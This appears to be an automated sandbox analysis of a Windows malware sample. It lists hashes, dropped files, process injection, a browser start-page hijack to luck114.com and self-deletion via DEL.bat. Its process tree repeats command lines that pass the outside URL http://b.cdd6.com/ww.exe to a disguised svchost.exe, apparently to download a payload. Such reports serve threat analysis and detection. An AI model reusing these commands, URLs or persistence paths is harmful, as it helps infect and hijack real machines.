Analysis
max time kernel: 145s
max time network: 16s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 06/07/2024, 11:24
Static task: static1
Behavioral task: behavioral1
  Sample: 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
  Resource: win10v2004-20240704-en
General
Target: 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
Size: 47KB
MD5: 286094cfaaca44ec9db1e60f4fce1988
SHA1: 64ca1a4cb8d74780821a7762c515ec8487563d99
SHA256: 0358faf087cad9fd6ecf99491130c0fd1f699c3793a62d7ebfdfcacee60922e9
SHA512: 5b87b98b3121866bfe5948772ef39b89f66f5907168496d98beb9c98ddff4c3aed199c71a3a477877f11ee7b25a12e9b3ec69e6e033262c3b0a69a377e441a3e
SSDEEP: 768:ut2SmxfGgix9rKevJjrr/qT/u9/1g2bCo2KPYJ/ukJV9HNFjNE2D8Lb/Ot72B2S:o2Deg5m/qbKXeo2AsugV9tFJE2gLbWkl
Malware Config
Signatures
Drops file in Drivers directory (1 IoC)
description | ioc | Process
File created | C:\Windows\SysWOW64\Drivers\Atieccx.sys | cmdd

Deletes itself (1 IoC)
pid | Process
2068 | cmd.exe

Executes dropped EXE (20 IoCs)
pid | Process
428 | 363safe.exe
768 | svchost.exe
2712 | svchost.exe
2988 | svchost.exe
2640 | svchost.exe
1744 | cmdd
2512 | svchost.exe
3008 | svchost.exe
1760 | svchost.exe
2380 | svchost.exe
1720 | svchost.exe
1528 | svchost.exe
840 | svchost.exe
1772 | svchost.exe
2320 | svchost.exe
2600 | svchost.exe
1844 | svchost.exe
2432 | svchost.exe
2920 | svchost.exe
1300 | svchost.exe

Loads dropped DLL (64 IoCs)
pid | Process
2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
428 | 363safe.exe
428 | 363safe.exe
768 | svchost.exe
768 | svchost.exe
2720 | WerFault.exe
2720 | WerFault.exe
2720 | WerFault.exe
768 | svchost.exe
2752 | WerFault.exe
2752 | WerFault.exe
2752 | WerFault.exe
768 | svchost.exe
2148 | WerFault.exe
2148 | WerFault.exe
2148 | WerFault.exe
2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
768 | svchost.exe
2948 | WerFault.exe
2948 | WerFault.exe
2948 | WerFault.exe
2552 | svchost.exe
768 | svchost.exe
2340 | WerFault.exe
2340 | WerFault.exe
2340 | WerFault.exe
768 | svchost.exe
1676 | WerFault.exe
1676 | WerFault.exe
1676 | WerFault.exe
768 | svchost.exe
2372 | WerFault.exe
2372 | WerFault.exe
2372 | WerFault.exe
768 | svchost.exe
920 | WerFault.exe
920 | WerFault.exe
920 | WerFault.exe
768 | svchost.exe
2016 | WerFault.exe
2016 | WerFault.exe
2016 | WerFault.exe
768 | svchost.exe
652 | WerFault.exe
652 | WerFault.exe
652 | WerFault.exe
768 | svchost.exe
2508 | WerFault.exe
2508 | WerFault.exe
2508 | WerFault.exe
768 | svchost.exe
2396 | WerFault.exe
2396 | WerFault.exe
2396 | WerFault.exe
768 | svchost.exe
2116 | WerFault.exe
2116 | WerFault.exe
2116 | WerFault.exe
768 | svchost.exe
2252 | WerFault.exe
2252 | WerFault.exe
2252 | WerFault.exe

Drops file in System32 directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\SysWOW64\msfcsg.dll | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
File created | C:\Windows\SysWOW64\363safe.exe | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 2160 set thread context of 2552 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 44

Drops file in Windows directory (3 IoCs)
description | ioc | Process
File created | C:\Windows\Downloaded Program Files\svchost.exe | svchost.exe
File created | C:\Windows\Fonts\cmdd | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
File created | C:\Windows\Fonts\svchost.exe | 363safe.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (17 IoCs)
pid | pid_target | Process | procid_target
2720 | 2712 | WerFault.exe | 31
2752 | 2988 | WerFault.exe | 34
2148 | 2640 | WerFault.exe | 37
2948 | 2512 | WerFault.exe | 41
2340 | 3008 | WerFault.exe | 47
1676 | 1760 | WerFault.exe | 50
2372 | 2380 | WerFault.exe | 53
920 | 1720 | WerFault.exe | 56
2016 | 1528 | WerFault.exe | 59
652 | 840 | WerFault.exe | 62
2508 | 1772 | WerFault.exe | 65
2396 | 2320 | WerFault.exe | 68
2116 | 2600 | WerFault.exe | 71
2252 | 1844 | WerFault.exe | 74
2940 | 2432 | WerFault.exe | 77
2068 | 2920 | WerFault.exe | 80
2220 | 1300 | WerFault.exe | 83
Modifies Internet Explorer start page (1 TTP, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://luck114.com" | 363safe.exe
Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid | Process
2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
428 | 363safe.exe
768 | svchost.exe

Suspicious behavior: LoadsDriver (1 IoC)
pid | Process
476 | Process not Found
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 2160 wrote to memory of 428 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 29
PID 2160 wrote to memory of 428 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 29
PID 2160 wrote to memory of 428 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 29
PID 2160 wrote to memory of 428 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 29
PID 428 wrote to memory of 768 | 428 | 363safe.exe | 30
PID 428 wrote to memory of 768 | 428 | 363safe.exe | 30
PID 428 wrote to memory of 768 | 428 | 363safe.exe | 30
PID 428 wrote to memory of 768 | 428 | 363safe.exe | 30
PID 768 wrote to memory of 2712 | 768 | svchost.exe | 31
PID 768 wrote to memory of 2712 | 768 | svchost.exe | 31
PID 768 wrote to memory of 2712 | 768 | svchost.exe | 31
PID 768 wrote to memory of 2712 | 768 | svchost.exe | 31
PID 2712 wrote to memory of 2720 | 2712 | svchost.exe | 33
PID 2712 wrote to memory of 2720 | 2712 | svchost.exe | 33
PID 2712 wrote to memory of 2720 | 2712 | svchost.exe | 33
PID 2712 wrote to memory of 2720 | 2712 | svchost.exe | 33
PID 768 wrote to memory of 2988 | 768 | svchost.exe | 34
PID 768 wrote to memory of 2988 | 768 | svchost.exe | 34
PID 768 wrote to memory of 2988 | 768 | svchost.exe | 34
PID 768 wrote to memory of 2988 | 768 | svchost.exe | 34
PID 2988 wrote to memory of 2752 | 2988 | svchost.exe | 36
PID 2988 wrote to memory of 2752 | 2988 | svchost.exe | 36
PID 2988 wrote to memory of 2752 | 2988 | svchost.exe | 36
PID 2988 wrote to memory of 2752 | 2988 | svchost.exe | 36
PID 768 wrote to memory of 2640 | 768 | svchost.exe | 37
PID 768 wrote to memory of 2640 | 768 | svchost.exe | 37
PID 768 wrote to memory of 2640 | 768 | svchost.exe | 37
PID 768 wrote to memory of 2640 | 768 | svchost.exe | 37
PID 2640 wrote to memory of 2148 | 2640 | svchost.exe | 39
PID 2640 wrote to memory of 2148 | 2640 | svchost.exe | 39
PID 2640 wrote to memory of 2148 | 2640 | svchost.exe | 39
PID 2640 wrote to memory of 2148 | 2640 | svchost.exe | 39
PID 2160 wrote to memory of 1744 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 40
PID 2160 wrote to memory of 1744 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 40
PID 2160 wrote to memory of 1744 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 40
PID 2160 wrote to memory of 1744 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 40
PID 768 wrote to memory of 2512 | 768 | svchost.exe | 41
PID 768 wrote to memory of 2512 | 768 | svchost.exe | 41
PID 768 wrote to memory of 2512 | 768 | svchost.exe | 41
PID 768 wrote to memory of 2512 | 768 | svchost.exe | 41
PID 2512 wrote to memory of 2948 | 2512 | svchost.exe | 43
PID 2512 wrote to memory of 2948 | 2512 | svchost.exe | 43
PID 2512 wrote to memory of 2948 | 2512 | svchost.exe | 43
PID 2512 wrote to memory of 2948 | 2512 | svchost.exe | 43
PID 2160 wrote to memory of 2552 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 44
PID 2160 wrote to memory of 2552 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 44
PID 2160 wrote to memory of 2552 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 44
PID 2160 wrote to memory of 2552 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 44
PID 2160 wrote to memory of 2552 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 44
PID 2160 wrote to memory of 2068 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 45
PID 2160 wrote to memory of 2068 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 45
PID 2160 wrote to memory of 2068 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 45
PID 2160 wrote to memory of 2068 | 2160 | 286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe | 45
PID 768 wrote to memory of 3008 | 768 | svchost.exe | 47
PID 768 wrote to memory of 3008 | 768 | svchost.exe | 47
PID 768 wrote to memory of 3008 | 768 | svchost.exe | 47
PID 768 wrote to memory of 3008 | 768 | svchost.exe | 47
PID 3008 wrote to memory of 2340 | 3008 | svchost.exe | 49
PID 3008 wrote to memory of 2340 | 3008 | svchost.exe | 49
PID 3008 wrote to memory of 2340 | 3008 | svchost.exe | 49
PID 3008 wrote to memory of 2340 | 3008 | svchost.exe | 49
PID 768 wrote to memory of 1760 | 768 | svchost.exe | 50
PID 768 wrote to memory of 1760 | 768 | svchost.exe | 50
PID 768 wrote to memory of 1760 | 768 | svchost.exe | 50
Processes
[1] C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\286094cfaaca44ec9db1e60f4fce1988_JaffaCakes118.exe"
    PID: 2160
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\363safe.exe
      Command line: C:\Windows\system32\363safe.exe
      PID: 428
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in Windows directory
      - Modifies Internet Explorer start page
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Fonts\svchost.exe
        Command line: C:\Windows\Fonts\svchost.exe
        PID: 768
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.1 http://b.cdd6.com/ww.exe
          PID: 2712
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 84
            PID: 2720
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.2 http://b.cdd6.com/ww.exe
          PID: 2988
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 84
            PID: 2752
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.3 http://b.cdd6.com/ww.exe
          PID: 2640
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 84
            PID: 2148
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.4 http://b.cdd6.com/ww.exe
          PID: 2512
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 84
            PID: 2948
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.5 http://b.cdd6.com/ww.exe
          PID: 3008
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 84
            PID: 2340
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.6 http://b.cdd6.com/ww.exe
          PID: 1760
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 84
            PID: 1676
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.7 http://b.cdd6.com/ww.exe
          PID: 2380
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 84
            PID: 2372
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.8 http://b.cdd6.com/ww.exe
          PID: 1720
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 84
            PID: 920
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.9 http://b.cdd6.com/ww.exe
          PID: 1528
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 84
            PID: 2016
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.10 http://b.cdd6.com/ww.exe
          PID: 840
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 84
            PID: 652
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.11 http://b.cdd6.com/ww.exe
          PID: 1772
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 84
            PID: 2508
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.12 http://b.cdd6.com/ww.exe
          PID: 2320
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 84
            PID: 2396
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.13 http://b.cdd6.com/ww.exe
          PID: 2600
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 84
            PID: 2116
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.14 http://b.cdd6.com/ww.exe
          PID: 1844
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 84
            PID: 2252
            - Loads dropped DLL
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.15 http://b.cdd6.com/ww.exe
          PID: 2432
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 84
            PID: 2940
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.16 http://b.cdd6.com/ww.exe
          PID: 2920
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 84
            PID: 2068
            - Program crash
      [4] C:\Windows\Downloaded Program Files\svchost.exe
          Command line: "C:\Windows\Downloaded Program Files\svchost.exe" 10.127.0.17 http://b.cdd6.com/ww.exe
          PID: 1300
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 84
            PID: 2220
            - Program crash
  [2] C:\Windows\Fonts\cmdd
      Command line: C:\Windows\Fonts\cmdd
      PID: 1744
      - Drops file in Drivers directory
      - Executes dropped EXE
  [2] C:\Windows\SysWOW64\svchost.exe
      Command line: svchost.exe
      PID: 2552
      - Loads dropped DLL
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c c:\DEL.bat
      PID: 2068
      - Deletes itself
Network
MITRE ATT&CK Enterprise v15
Downloads